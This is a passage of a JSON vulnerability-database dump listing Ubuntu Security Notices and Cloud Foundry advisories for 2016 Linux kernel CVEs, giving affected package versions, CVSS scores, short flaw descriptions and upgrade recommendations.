"packageName": "linux-image-generic-pae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-115.157", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-115-powerpc64-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0.115.131", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0.115.131", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-highbank", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0.115.131", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-115.157", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-115-highbank", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-115.157", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-115-generic-pae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0.115.131", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc64-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-115.157", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-115-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-115.157", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-115-virtual", "operator": "lt"}], "description": "Ondrej Kozina discovered that the keyring interface in the Linux kernel contained a buffer overflow when displaying timeout events via the /proc/keys interface. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-7042)\n\nDmitry Vyukov discovered a use-after-free vulnerability during error processing in the recvmmsg(2) implementation in the Linux kernel. A remote attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2016-7117)", "edition": 3, "reporter": "Ubuntu", "published": "2016-11-11T00:00:00", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7117", "CVE-2016-7042"], "modified": "2016-11-11T00:00:00", "id": "USN-3126-1", "href": "https://usn.ubuntu.com/3126-1/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:09:46", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2016-7117", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-7042", "https://usn.ubuntu.com/usn/usn-3126-1"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-1493.120", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-1493-omap4", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0.1493.88", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-omap4", "operator": "lt"}], "description": "Ondrej Kozina discovered that the keyring interface in the Linux kernel contained a buffer overflow when displaying timeout events via the /proc/keys interface. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-7042)\n\nDmitry Vyukov discovered a use-after-free vulnerability during error processing in the recvmmsg(2) implementation in the Linux kernel. A remote attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2016-7117)", "edition": 3, "reporter": "Ubuntu", "published": "2016-11-11T00:00:00", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7117", "CVE-2016-7042"], "modified": "2016-11-11T00:00:00", "id": "USN-3126-2", "href": "https://usn.ubuntu.com/3126-2/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:09:27", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2016-6828", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-7039", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-6480", "https://usn.ubuntu.com/usn/usn-3099-1"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "4.4.0-42.62~14.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-42-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "4.4.0-42.62~14.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-42-lowlatency", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "4.4.0-42.62~14.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-42-powerpc-e500mc", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "4.4.0-42.62~14.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-42-powerpc64-emb", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "4.4.0-42.62~14.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-42-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "4.4.0-42.62~14.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-42-generic-lpae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "4.4.0-42.62~14.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-42-powerpc64-smp", "operator": "lt"}], "description": "USN-3099-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nVladim\u00edr Bene\u0161 discovered an unbounded recursion in the VLAN and TEB Generic Receive Offload (GRO) processing implementations in the Linux kernel, A remote attacker could use this to cause a stack corruption, leading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP retransmit queue handling code in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller driver in the Linux kernel when handling ioctl()s. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-6480)", "edition": 3, "reporter": "Ubuntu", "published": "2016-10-11T00:00:00", "title": "Linux kernel (Xenial HWE) vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "modified": "2016-10-11T00:00:00", "id": "USN-3099-2", "href": "https://usn.ubuntu.com/3099-2/", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:45", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2016-6828", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-6136", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-6480"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-111.153", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-111-powerpc64-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-111.153", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-111-omap", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-111.153", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-111-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-111.153", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-111-virtual", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-111.153", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-111-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-111.153", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-111-highbank", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-111.153", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-111-generic-pae", "operator": "lt"}], "description": "Marco Grassi discovered a use-after-free condition could occur in the TCP retransmit queue handling code in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the Linux kernel. A local attacker could use this to corrupt audit logs or disrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller driver in the Linux kernel when handling ioctl()s. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-6480)", "edition": 3, "reporter": "Ubuntu", "published": "2016-10-11T00:00:00", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828"], "modified": "2016-10-11T00:00:00", "id": "USN-3097-1", "href": "https://usn.ubuntu.com/3097-1/", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:09:21", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2016-6828", "https://usn.ubuntu.com/usn/usn-3097-1", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-6136", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-6480"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-1489.116", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-1489-omap4", "operator": "lt"}], "description": "Marco Grassi discovered a use-after-free condition could occur in the TCP retransmit queue handling code in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the Linux kernel. A local attacker could use this to corrupt audit logs or disrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller driver in the Linux kernel when handling ioctl()s. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-6480)", "edition": 3, "reporter": "Ubuntu", "published": "2016-10-13T00:00:00", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828"], "modified": "2016-10-13T00:00:00", "id": "USN-3097-2", "href": "https://usn.ubuntu.com/3097-2/", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:22", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2016-6828", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-7039", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-6480", "https://usn.ubuntu.com/usn/usn-3099-1"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.4.0-1027.33", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-1027-raspi2", "operator": "lt"}], "description": "Vladim\u00edr Bene\u0161 discovered an unbounded recursion in the VLAN and TEB Generic Receive Offload (GRO) processing implementations in the Linux kernel, A remote attacker could use this to cause a stack corruption, leading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP retransmit queue handling code in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller driver in the Linux kernel when handling ioctl()s. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-6480)", "edition": 3, "reporter": "Ubuntu", "published": "2016-10-11T00:00:00", "title": "Linux kernel (Raspberry Pi 2) vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "modified": "2016-10-11T00:00:00", "id": "USN-3099-3", "href": "https://usn.ubuntu.com/3099-3/", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:16", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2016-6828", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-7039", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-6480", "https://usn.ubuntu.com/usn/usn-3099-1"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.4.0-1030.33", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-1030-snapdragon", "operator": "lt"}], "description": "Vladim\u00edr Bene\u0161 discovered an unbounded recursion in the VLAN and TEB Generic Receive Offload (GRO) processing implementations in the Linux kernel, A remote attacker could use this to cause a stack corruption, leading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP retransmit queue handling code in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller driver in the Linux kernel when handling ioctl()s. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-6480)", "edition": 3, "reporter": "Ubuntu", "published": "2016-10-11T00:00:00", "title": "Linux kernel (Qualcomm Snapdragon) vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "modified": "2016-10-11T00:00:00", "id": "USN-3099-4", "href": "https://usn.ubuntu.com/3099-4/", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:30", "references": ["https://usn.ubuntu.com/usn/usn-3098-1", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-6828", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-7039", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-6136", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-6480"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.13.0-98.145~precise1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-98-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.13.0-98.145~precise1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-98-generic-lpae", "operator": "lt"}], "description": "USN-3098-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu 12.04 LTS.\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP retransmit queue handling code in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2016-6828)\n\nVladim\u221a\u2260r Bene\u0147\u00b0 discovered an unbounded recursion in the VLAN and TEB Generic Receive Offload (GRO) processing implementations in the Linux kernel, A remote attacker could use this to cause a stack corruption, leading to a denial of service (system crash). (CVE-2016-7039)\n\nPengfei Wang discovered a race condition in the audit subsystem in the Linux kernel. A local attacker could use this to corrupt audit logs or disrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller driver in the Linux kernel when handling ioctl()s. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-6480)", "edition": 3, "reporter": "Ubuntu", "published": "2016-10-11T00:00:00", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828", "CVE-2016-7039"], "modified": "2016-10-11T00:00:00", "id": "USN-3098-2", "href": "https://usn.ubuntu.com/3098-2/", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:09:05", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2016-6828", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-7039", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-6136", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-6480"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-98.145", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-98-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-98.145", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-98-lowlatency", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-98.145", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-98-generic-lpae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-98.145", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-98-powerpc64-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-98.145", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-98-powerpc-e500mc", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-98.145", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-98-powerpc64-emb", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-98.145", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-98-powerpc-e500", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-98.145", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-98-powerpc-smp", "operator": "lt"}], "description": "Vladim\u00edr Bene\u0161 discovered an unbounded recursion in the VLAN and TEB Generic Receive Offload (GRO) processing implementations in the Linux kernel, A remote attacker could use this to cause a stack corruption, leading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP retransmit queue handling code in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the Linux kernel. A local attacker could use this to corrupt audit logs or disrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller driver in the Linux kernel when handling ioctl()s. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-6480)", "edition": 3, "reporter": "Ubuntu", "published": "2016-10-11T00:00:00", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828", "CVE-2016-7039"], "modified": "2016-10-11T00:00:00", "id": "USN-3098-1", "href": "https://usn.ubuntu.com/3098-1/", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:09", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2016-6828", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-6130", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-7039", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-6480"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.4.0-42.62", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-42-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.4.0-42.62", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-42-lowlatency", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.4.0-42.62", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-42-powerpc64-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.4.0-42.62", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-42-generic-lpae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.4.0-42.62", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-42-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.4.0-42.62", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-42-powerpc-e500mc", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.4.0-42.62", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-42-powerpc64-emb", "operator": "lt"}], "description": "Vladim\u00edr Bene\u0161 discovered an unbounded recursion in the VLAN and TEB Generic Receive Offload (GRO) processing implementations in the Linux kernel, A remote attacker could use this to cause a stack corruption, leading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP retransmit queue handling code in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the s390 SCLP console driver for the Linux kernel when handling ioctl()s. A local attacker could use this to obtain sensitive information from kernel memory. (CVE-2016-6130)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller driver in the Linux kernel when handling ioctl()s. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-6480)", "edition": 3, "reporter": "Ubuntu", "published": "2016-10-11T00:00:00", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039", "CVE-2016-6130"], "modified": "2016-10-11T00:00:00", "id": "USN-3099-1", "href": "https://usn.ubuntu.com/3099-1/", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "cloudfoundry": [{"lastseen": "2018-09-07T03:25:52", "references": [], "description": "USN-3099-2 Linux kernel vulnerabilities\n\n# \n\nHigh\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04 LTS\n\n# Description\n\nUSN-3099-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nVladim\u00edr Bene\u0161 discovered an unbounded recursion in the VLAN and TEB Generic Receive Offload (GRO) processing implementations in the Linux kernel. A remote attacker could use this to cause a stack corruption, leading to a denial of service (system crash). ([CVE-2016-7039](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-7039.html>))\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP retransmit queue handling code in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. ([CVE-2016-6828](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6828.html>))\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller driver in the Linux kernel when handling ioctl()s. A local attacker could use this to cause a denial of service (system crash). ([CVE-2016-6480](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6480.html>))\n\n# Affected Products and Versions\n\n_Severity is high unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including:\n * All versions prior to 3146.24\n * 3151.x versions prior to 3151.2\n * 3232.x versions prior to 3232.22\n * 3233.x versions prior to 3233.2\n * 3262.x versions prior to 3262.21\n * Other versions prior to 3263.7\n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry team recommends upgrading to the following BOSH stemcells:\n * Upgrade all versions prior to 3146.x to 3146.24\n * Upgrade 3151.x versions to 3151.2\n * Upgrade 3232.x versions to 3232.22\n * Upgrade 3233.x versions to 3233.2\n * Upgrade 3262.x versions to 3262.21\n * Upgrade other versions to 3263.7\n\n# Credit\n\nVladim\u00edr Bene\u0161, Marco Grassi, Pengfei Wang\n\n# References\n\n * <https://www.ubuntu.com/usn/usn-3099-2/>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6480.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6828.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-7039.html>\n", "edition": 4, "reporter": "Cloud Foundry", "published": "2016-10-01T00:00:00", "title": "USN-3099-2 Linux kernel vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "modified": "2016-10-01T00:00:00", "id": "CFOUNDRY:DC8819DC530904F76913C7D9F499576C", "href": "https://www.cloudfoundry.org/blog/usn-3099-2/", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-07T03:26:03", "references": [], "description": "USN 3020-1 Linux kernel (Vivid HWE) vulnerabilities\n\n# \n\nLow \u2013 High\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\nCanonical Ubuntu 14.04 LTS\n\n# Description\n\nJesse Hertz and Tim Newsham discovered that the Linux netfilter implementation did not correctly perform validation when handling 32 bit compatibility IPT_SO_SET_REPLACE events on 64 bit platforms. A local unprivileged attacker could use this to cause a denial of service (system crash) or execute arbitrary code with administrative privileges. ([CVE-2016-4997](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-4997.html>)) Severity: High\n\nKangjie Lu discovered an information leak in the core USB implementation in the Linux kernel. A local attacker could use this to obtain potentially sensitive information from kernel memory. ([CVE-2016-4482](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-4482.html>)) Severity: Medium\n\nKangjie Lu discovered an information leak in the timer handling implementation in the Advanced Linux Sound Architecture (ALSA) subsystem of the Linux kernel. A local attacker could use this to obtain potentially sensitive information from kernel memory. ([CVE-2016-4569](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-4569.html>), [CVE-2016-4578](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-4578.html>)) Severity: Low\n\nKangjie Lu discovered an information leak in the X.25 Call Request handling in the Linux kernel. A local attacker could use this to obtain potentially sensitive information from kernel memory. ([CVE-2016-4580](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-4580.html>)) Severity: Low\n\nIt was discovered that an information leak exists in the Rock Ridge implementation in the Linux kernel. A local attacker who is able to mount a malicious iso9660 file system image could exploit this flaw to obtain potentially sensitive information from kernel memory. ([CVE-2016-4913](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-4913.html>)) Severity: Low\n\nBaozeng Ding discovered that the Transparent Inter-process Communication (TIPC) implementation in the Linux kernel did not verify socket existence before use in some situations. A local attacker could use this to cause a denial of service (system crash). ([CVE-2016-4951](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-4951.html>)) Severity: Low\n\nJesse Hertz and Tim Newsham discovered that the Linux netfilter implementation did not correctly perform validation when handling IPT_SO_SET_REPLACE events. A local unprivileged attacker could use this to cause a denial of service (system crash) or obtain potentially sensitive information from kernel memory. ([CVE-2016-4998](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-4998.html>)) Severity: Medium\n\n# Affected Products and Versions\n\n_Severity is low unless otherwise noted. \n_\n\n * Cloud Foundry BOSH stemcells 3146.x versions prior to 3146.17 AND other versions prior to 3232.12 are vulnerable \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry team has released patched BOSH stemcells 3146.17 and 3232.12 with an upgraded Linux kernel that resolves the aforementioned issues. We recommend that Operators upgrade BOSH stemcell 3146.x versions to 3146.17 OR other versions to 3232.12\n\n# 